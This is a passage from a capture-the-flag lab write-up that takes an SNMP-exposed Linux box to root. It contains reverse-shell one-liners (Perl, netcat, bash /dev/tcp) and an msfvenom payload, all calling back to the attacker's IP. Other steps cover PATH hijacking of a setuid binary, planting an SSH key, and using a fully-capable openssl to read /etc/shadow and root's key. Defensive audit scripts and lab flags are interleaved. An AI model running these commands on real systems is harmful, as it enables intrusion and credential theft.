NET-SNMP-EXTEND-MIB::nsExtendExecType."test2" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendExecType."test3" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendRunType."test1" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."test2" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."test3" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."test1" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStorage."test2" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStorage."test3" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."test1" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendStatus."test2" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendStatus."test3" = INTEGER: active(1)
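Walked this way, nsExtendConfigTable is also a useful audit source for a defender: it shows exactly what snmpd will execute on every read. The Python below is an added example (not from the original notes or from Net-SNMP) that parses snmpwalk output like the above, including the multi-line STRING for test2, decodes nsExtendResult as a wait(2) status (8960 is exit code 35, matching the `exit 35` in test2; 512 is exit code 2 from /bin/sh, consistent with /tmp/shtest not existing at the time of the walk), and flags entries whose command is resolved via PATH or which run a script from a world-writable directory, as test3 does with /tmp/shtest. SAMPLE_WALK is assembled from the walks above; the severity labels, interpreter list and directory list are assumptions.

```python
"""Parse snmpwalk output of the NET-SNMP-EXTEND-MIB tables and audit what the
agent runs on every read. Added example; not from the original notes or from
Net-SNMP. SAMPLE_WALK is assembled from the walks shown on the page.
"""
import re
from typing import Dict, List, Tuple

WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")                 # assumed list
INTERPRETERS = {"sh", "bash", "dash", "perl", "python", "python3"}  # assumed list

SAMPLE_WALK = """\
NET-SNMP-EXTEND-MIB::nsExtendCommand."test1" = STRING: /bin/echo
NET-SNMP-EXTEND-MIB::nsExtendCommand."test2" = STRING: echo
NET-SNMP-EXTEND-MIB::nsExtendCommand."test3" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."test1" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendArgs."test2" = STRING: Hello, world! ; echo Hi there ; exit 35
NET-SNMP-EXTEND-MIB::nsExtendArgs."test3" = STRING: /tmp/shtest
NET-SNMP-EXTEND-MIB::nsExtendExecType."test1" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendExecType."test2" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendExecType."test3" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test1" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test2" = STRING: Hello, world!
Hi there
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test3" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendResult."test1" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendResult."test2" = INTEGER: 8960
NET-SNMP-EXTEND-MIB::nsExtendResult."test3" = INTEGER: 512
"""

# column name, extension name, optional row index, type, value
LINE_RE = re.compile(r'^NET-SNMP-EXTEND-MIB::(\w+)\."([^"]+)"(?:\.\d+)? = (STRING|INTEGER): ?(.*)$')


def parse_walk(text: str) -> Dict[str, Dict[str, str]]:
    """Group varbinds by extension name: {"test2": {"nsExtendCommand": "echo", ...}}.
    A line that does not start a varbind continues the previous multi-line STRING."""
    entries: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if m:
            col, name, _typ, value = m.groups()
            entries.setdefault(name, {})[col] = value
            current = (name, col)
        elif current is not None:
            name, col = current
            entries[name][col] += "\n" + raw
    return entries


def decode_result(result: int) -> Tuple[int, int]:
    """nsExtendResult is the raw wait(2) status: exit code in the high byte,
    terminating signal (if any) in the low 7 bits."""
    return result >> 8, result & 0x7F


def audit_extensions(text: str) -> List[Tuple[str, str, str]]:
    """(extension, severity, message) findings over a parsed walk."""
    findings: List[Tuple[str, str, str]] = []
    for name, cols in parse_walk(text).items():
        cmd = cols.get("nsExtendCommand", "")
        args = cols.get("nsExtendArgs", "")
        exe = cmd.rsplit("/", 1)[-1]
        if cmd and not cmd.startswith("/"):
            findings.append((name, "MEDIUM", f"command {cmd!r} resolved via PATH"))
        if exe in INTERPRETERS:
            for word in args.split():
                if word.startswith(WRITABLE_DIRS):
                    findings.append((name, "HIGH",
                                     f"{cmd} runs a script from a world-writable path: {word}"))
        if "nsExtendResult" in cols:
            code, sig = decode_result(int(cols["nsExtendResult"]))
            if code or sig:
                findings.append((name, "INFO", f"last run exited {code} (signal {sig})"))
    return findings


if __name__ == "__main__":
    for ext, sev, msg in audit_extensions(SAMPLE_WALK):
        print(f"{ext:6} [{sev}] {msg}")
```

An extend entry that points at a script in a directory writable by other local users means that whoever can write there runs code as the snmpd user on the next SNMP read; the fix is a root-owned script in a root-owned directory, or no extend entry at all.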
// Create the shtest script as follows. The current shell is limited: we failed to run a reverse shell binary, and for reverse shell one-liners there is no netcat and bash cannot be run, but Perl 5 is available, so we use a Perl reverse shell command
$ cat shtest
#nc -e /bin/sh 192.168.49.243 80
#/bin/bash -i >& /dev/tcp/192.168.49.243/80 0>&1
perl -e 'use Socket;$i="192.168.49.243";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

// Upload the script to /tmp

// Trigger the rev shell command


$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.243.113 NET-SNMP-EXTEND-MIB::nsExtendOutput1Table
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."test1" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."test2" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."test3" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test1" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test2" = STRING: Hello, world!
Hi there
Timeout: No Response from 192.168.243.113
-> From user www-data, we get shell on port 80 as user Debian-snmp

// Get a better shell using python3

// There is a home dir for user tom

Local.txt: 95c4e16e3a9507a2cf96a5d9eb174da3
(the local.txt we found above is valid)
// Found SUID binary
Debian-snmp@escape:/tmp$ /usr/bin/logconsole

/$$ /$$
| $$ | $$
| $$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$ /$$$$$$ | $$ /$$$$$$
| $$ /$$__ $$ /$$__ $$ /$$_____/ /$$__ $$| $$__ $$ /$$_____/ /$$__ $$| $$ /$$__ $$
| $$| $$ \ $$| $$ \ $$| $$ | $$ \ $$| $$ \ $$| $$$$$$ | $$ \ $$| $$| $$$$$$$$
| $$| $$ | $$| $$ | $$| $$ | $$ | $$| $$ | $$ \____ $$| $$ | $$| $$| $$_____/
| $$| $$$$$$/| $$$$$$$| $$$$$$$| $$$$$$/| $$ | $$ /$$$$$$$/| $$$$$$/| $$| $$$$$$$
|__/ \______/ \____ $$ \_______/ \______/ |__/ |__/|_______/ \______/ |__/ \_______/
/$$ \ $$
| $$$$$$/
\______/

1. About the Sytem
2. Current Process Status
3. List all the Users Logged in and out
4. Quick summary of User Logged in
5. IP Routing Table
6. CPU Information
7. To Exit
99. Generate the Report

Enter the option ==>


// /bin/uname -a

// /bin/ps aux

// /usr/bin/last

// /usr/bin/w

// /sbin/ip route | column -t


// lscpu

// Invalid Option!!!!

// Option 99 -> SegFault Core dumped -> buffer overflow ???

// Set up a Python server on the target machine to host the logconsole binary, then download it to our Kali machine to analyze
$ python3 -m http.server 80
$ strings logconsole
/lib64/ld-linux-x86-64.so.2
mgUa
fopen
__isoc99_scanf
setreuid
putchar
stdin
popen
printf
fgets
stdout
fputs
fclose
system
getuid
fwrite
geteuid
__cxa_finalize
setvbuf
__libc_start_main
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
/home/tom/logconsole.txt
*********************************************************************
/$$ /$$
| $$ | $$
| $$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$ /$$$$$$ | $$ /$$$$$$
| $$ /$$__ $$ /$$__ $$ /$$_____/ /$$__ $$| $$__ $$ /$$_____/ /$$__ $$| $$ /$$__ $$
| $$| $$ \ $$| $$ \ $$| $$ | $$ \ $$| $$ \ $$| $$$$$$ | $$ \ $$| $$| $$$$$$$$
| $$| $$ | $$| $$ | $$| $$ | $$ | $$| $$ | $$ \____ $$| $$ | $$| $$| $$_____/
| $$| $$$$$$/| $$$$$$$| $$$$$$$| $$$$$$/| $$ | $$ /$$$$$$$/| $$$$$$/| $$| $$$$$$$
|__/ \______/ \____ $$ \_______/ \______/ |__/ |__/|_______/ \______/ |__/ \_______/
/$$ \ $$
| $$$$$$/
\______/

[1;31m
1. About the Sytem
2. Current Process Status
3. List all the Users Logged in and out
4. Quick summary of User Logged in
5. IP Routing Table
6. CPU Information
7. To Exit
99. Generate the Report
[01;33m
Enter the option ==>
/bin/uname -a
/bin/ps aux
/usr/bin/last
/usr/bin/w
/sbin/ip route | column -t
lscpu
Invalid Option!!!!!
Report is Ready!!!
;*3$"
GCC: (Debian 10.2.0-7) 10.2.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
syslog.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
putchar@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
stdout@@GLIBC_2.2.5
stdin@@GLIBC_2.2.5
_edata
fclose@@GLIBC_2.2.5
getuid@@GLIBC_2.2.5
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
fputs@@GLIBC_2.2.5
geteuid@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
fgets@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
setreuid@@GLIBC_2.2.5
__bss_start
main
setvbuf@@GLIBC_2.2.5
get_output
popen@@GLIBC_2.2.5
fopen@@GLIBC_2.2.5
__isoc99_scanf@@GLIBC_2.7
fwrite@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

$ ldd /usr/bin/logconsole
ldd /usr/bin/logconsole
linux-vdso.so.1 (0x00007fffe0f6e000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd2e31c2000)
/lib64/ld-linux-x86-64.so.2 (0x00007fd2e35b3000)

$ ls -la /usr/bin/logconsole
-rwsrwxr-x 1 tom tom 17440 Dec 9 14:16 /usr/bin/logconsole
// Copy this binary to my host Ubuntu (using base64) to use IdaPro 64 bit

-> There are 2 functions: main() and get_output()


● main() reads the option entered by the user, invokes the corresponding command,
then calls get_output()
● get_output() opens “/home/tom/logconsole.txt” in append mode (the “a” mode flag) and
appends the command output to it. However, this file does not exist, and with the current
shell we cannot create a new file in /home/tom ??? After appending to the file, the function
calls fgets() to read up to 4096 characters (maybe the log file is too short and that is the
root cause of the segfault?)
○ How can we check whether get_output() is invoked?
○ How can we create logconsole.txt? It seems we have not created this file yet
// Looking at the commands the binary runs to collect the logs, only lscpu is invoked without
an absolute path (/usr/bin/lscpu).
-> Idea: create a reverse-shell binary named lscpu, prepend its directory to $PATH, and then
select option 6 to trigger it
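The PATH-hijack check above can be made systematic. What follows is an added example (not from the write-up and not code from the logconsole binary): a Python audit that takes the libc imports and command strings recovered with `strings` from a setuid helper and reports every program name that is handed to `/bin/sh` without an absolute path, since `system()` and `popen()` resolve such names through the caller's `$PATH`. Run over the listing reproduced above it flags `lscpu`, and it also flags `column` in the `/sbin/ip route | column -t` pipeline, which goes through the same lookup. The sample inputs are constructed from that listing; `SHELL_SPAWNERS`, `UID_CHANGERS` and all function names are my own.

```python
"""Audit a setuid binary's embedded shell commands for $PATH-dependent program names.

Added example for the write-up; inputs are constructed from the `strings`
output of /usr/bin/logconsole shown above."""
import re
import shlex

# Constructed: versioned libc imports as they appear in `strings` output.
SAMPLE_IMPORTS = """
putchar@@GLIBC_2.2.5
getuid@@GLIBC_2.2.5
system@@GLIBC_2.2.5
geteuid@@GLIBC_2.2.5
setreuid@@GLIBC_2.2.5
popen@@GLIBC_2.2.5
fopen@@GLIBC_2.2.5
__isoc99_scanf@@GLIBC_2.7
""".split()

# Constructed: the command strings found in the same output.
SAMPLE_COMMANDS = [
    "/bin/uname -a",
    "/bin/ps aux",
    "/usr/bin/last",
    "/usr/bin/w",
    "/sbin/ip route | column -t",
    "lscpu",
]

# libc entry points that run a string through /bin/sh or resolve argv[0] via $PATH.
SHELL_SPAWNERS = {"system", "popen", "execvp", "execvpe", "execlp"}
# Entry points showing the program switches uid, i.e. a privileged helper.
UID_CHANGERS = {"setuid", "seteuid", "setreuid", "setresuid"}

_SYMBOL_RE = re.compile(r"^([A-Za-z_]\w*)@@GLIBC_")
_ASSIGN_RE = re.compile(r"^[A-Za-z_]\w*=")      # leading VAR=value assignments
_SEPARATORS = {"|", "||", ";", "&&", "&"}       # start a new simple command


def imported_functions(strings):
    """Return the set of libc symbol names (name@@GLIBC_x.y) in `strings` output."""
    found = set()
    for s in strings:
        m = _SYMBOL_RE.match(s)
        if m:
            found.add(m.group(1))
    return found


def pipeline_programs(command):
    """Return the program name of every simple command in a shell command line.

    Splits on |, ||, ;, && and & like the shell would, and skips the
    VAR=value assignments that may precede a program name."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    programs, expect_program = [], True
    for tok in lexer:
        if tok in _SEPARATORS:
            expect_program = True
        elif expect_program and not _ASSIGN_RE.match(tok):
            programs.append(tok)
            expect_program = False
    return programs


def path_dependent(commands):
    """Return (command, program) pairs whose program has no '/' and is therefore
    looked up in $PATH at run time."""
    return [(cmd, prog) for cmd in commands
            for prog in pipeline_programs(cmd) if "/" not in prog]


def audit_binary(strings, commands):
    """Combine the two signals: does the binary spawn shells, change uid, and
    reference programs by bare name?"""
    imports = imported_functions(strings)
    spawners = sorted(imports & SHELL_SPAWNERS)
    return {
        "spawners": spawners,
        "uid_changers": sorted(imports & UID_CHANGERS),
        # Bare names only matter if a shell spawner is present.
        "path_dependent": path_dependent(commands) if spawners else [],
    }


if __name__ == "__main__":
    for key, value in audit_binary(SAMPLE_IMPORTS, SAMPLE_COMMANDS).items():
        print(f"{key}: {value}")
```

On the defender's side the fixes are the usual ones: reference every helper by absolute path or reset `PATH` (for example `setenv("PATH", "/usr/bin:/bin", 1)`) before calling `system()`/`popen()`, prefer an `exec*` call with an explicit argv over a shell string, and do not leave such a helper setuid (`chmod u-s`) when it only needs to append to a log file.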

// Generate the reverse shell binary, named lscpu

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.243 LPORT=8082 -f elf > lscpu

// Download our lscpu binary to the target and update $PATH


Debian-snmp@escape:/tmp$ export PATH=/tmp:$PATH
Debian-snmp@escape:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

// Run /usr/bin/logconsole and select option 6 to trigger our reverse shell -> we get a
shell as user tom
// Generate an SSH key pair and add id_rsa.pub to /home/tom/.ssh/authorized_keys, so that
we can SSH in as tom and get a stable shell without redoing every step.
$ ssh-keygen

tom@escape:/home/tom$ mkdir .ssh; cd .ssh


tom@escape:/home/tom/.ssh$ echo "ssh-rsa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 kali@kali" > authorized_keys

$ chmod 600 id_rsa


$ ssh -i id_rsa tom@192.168.243.113

/usr/bin/mtr-packet = cap_net_raw+ep
/opt/cert/openssl =ep

Read more:
● https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities
● https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
● https://gtfobins.github.io/gtfobins/openssl/
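The two getcap lines above are the finding that decides this box, and the second one is easy to misread: in the libcap text format an operator with no capability list in front of it applies to all capabilities, so `=ep` on `/opt/cert/openssl` means every capability is permitted and effective, including `cap_dac_read_search`, which is what lets an unprivileged user read `/etc/shadow` and `/root`. The example below is added here and is not from the write-up or the linked articles: a small reader for the capability text format (as documented in cap_from_text(3)) that accepts both the older getcap layout (`path = cap_net_raw+ep`) and the newer one (`path cap_net_raw=ep`) and ranks each entry. The sample lines are constructed from the output above plus one newer-format line; `HIGH_RISK` and the function names are my own.

```python
"""Rank file-capability findings from `getcap -r / 2>/dev/null` output.

Added example for the write-up. Parses the libcap text format well enough for
audit purposes: clauses are space separated, each clause is an optional
comma-separated capability list followed by one or more operator/flag groups
(=, + or - with any of e, p, i). An empty capability list means *all*."""
import re

# Constructed sample: the two entries reported on the box, plus a newer-format line.
SAMPLE_GETCAP = [
    "/usr/bin/mtr-packet = cap_net_raw+ep",
    "/opt/cert/openssl =ep",
    "/usr/bin/python3.9 cap_setuid=ep",
]

# Capabilities that alone let a process bypass file permissions or become uid 0.
HIGH_RISK = {
    "cap_dac_read_search", "cap_dac_override", "cap_setuid", "cap_setgid",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap",
}

_FLAGS = {"e": "effective", "p": "permitted", "i": "inheritable"}
_CLAUSE_RE = re.compile(r"^([a-z0-9_,]*)((?:[=+-][eip]*)+)$")
_OPS_RE = re.compile(r"([=+-])([eip]*)")


def _lower(capset, names):
    """Remove `names` from one set; 'all' clears it outright."""
    if names == {"all"}:
        capset.clear()
    elif "all" in capset:
        # Lowering a single capability from an 'all' set would need the full
        # capability table; this audit does not model that corner case.
        raise ValueError("cannot lower individual caps from an 'all' set")
    else:
        capset.difference_update(names)


def parse_cap_text(text):
    """Return {'effective': set, 'permitted': set, 'inheritable': set}.

    An empty capability list is recorded as the pseudo-name 'all'."""
    sets = {name: set() for name in _FLAGS.values()}
    for clause in text.split():
        m = _CLAUSE_RE.match(clause)
        if not m:
            raise ValueError(f"unrecognised clause: {clause!r}")
        names = set(m.group(1).split(",")) if m.group(1) else {"all"}
        for op, flags in _OPS_RE.findall(m.group(2)):
            targets = [_FLAGS[f] for f in flags]
            if op == "=":
                # '=' lowers the listed caps in all three sets, then raises
                # them only in the named sets (none named: plain reset).
                for capset in sets.values():
                    _lower(capset, names)
                for t in targets:
                    sets[t] |= names
            elif op == "+":
                for t in targets:
                    sets[t] |= names
            else:
                for t in targets:
                    _lower(sets[t], names)
    return sets


def parse_getcap_line(line):
    """Split one getcap output line into (path, capability sets)."""
    path, _, rest = line.strip().partition(" ")
    return path, parse_cap_text(rest)


def severity(sets):
    """Rank on the permitted set: that is what the process receives at exec."""
    permitted = sets["permitted"]
    if "all" in permitted:
        return "critical"      # every capability: equivalent to running as root
    if permitted & HIGH_RISK:
        return "high"
    return "low"


def audit_getcap(lines):
    """Return [(path, severity, sorted permitted caps)] for each non-empty line."""
    report = []
    for line in lines:
        if line.strip():
            path, sets = parse_getcap_line(line)
            report.append((path, severity(sets), sorted(sets["permitted"])))
    return report


if __name__ == "__main__":
    for path, level, caps in audit_getcap(SAMPLE_GETCAP):
        print(f"{level:8} {path} {','.join(caps)}")
```

Anything ranked critical or high deserves the same scrutiny as a setuid-root binary. The remediation for an entry like `/opt/cert/openssl =ep` is `setcap -r /opt/cert/openssl`, or, where a capability is genuinely needed, granting only that one (for example `cap_net_bind_service=ep` for a service that must bind a low port) and re-running `getcap -r / 2>/dev/null` as part of routine host auditing.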
tom@escape:/$ cd /tmp
tom@escape:/tmp$ /opt/cert/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
Can't load /home/tom/.rnd into RNG
139891892191680:error:2406F079:random number generator:RAND_load_file:Cannot open file:../crypto/rand/randfile.c:88:Filename=/home/tom/.rnd
Generating a RSA private key
.........................................+++++
....+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
// Just press Enter to skip the values for Country Name, …, Email Address
-> This generates two files: cert.pem and key.pem

// Now let’s start a server so we can read files…


tom@escape:/tmp$ cd /
tom@escape:/$ /opt/cert/openssl s_server -key /tmp/key.pem -cert /tmp/cert.pem -port 1337 -HTTP
Using default temp DH parameters
ACCEPT
FILE:etc/shadow
FILE:root/proof.txt
FILE:root/.ssh/id_rsa
...

// SSH in as tom from another terminal and read files with curl against localhost on port 1337
(we use -k to ignore the self-signed certificate error)
tom@escape:~$ curl -k "https://127.0.0.1:1337/etc/shadow"
tom@escape:~$ curl -k "https://127.0.0.1:1337/root/proof.txt"
tom@escape:~$ curl -k "https://127.0.0.1:1337/root/.ssh/id_rsa"

// File /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
// Now we can SSH in as the root user
Proof.txt: 2852da9b1760e3d18273681475109ebc
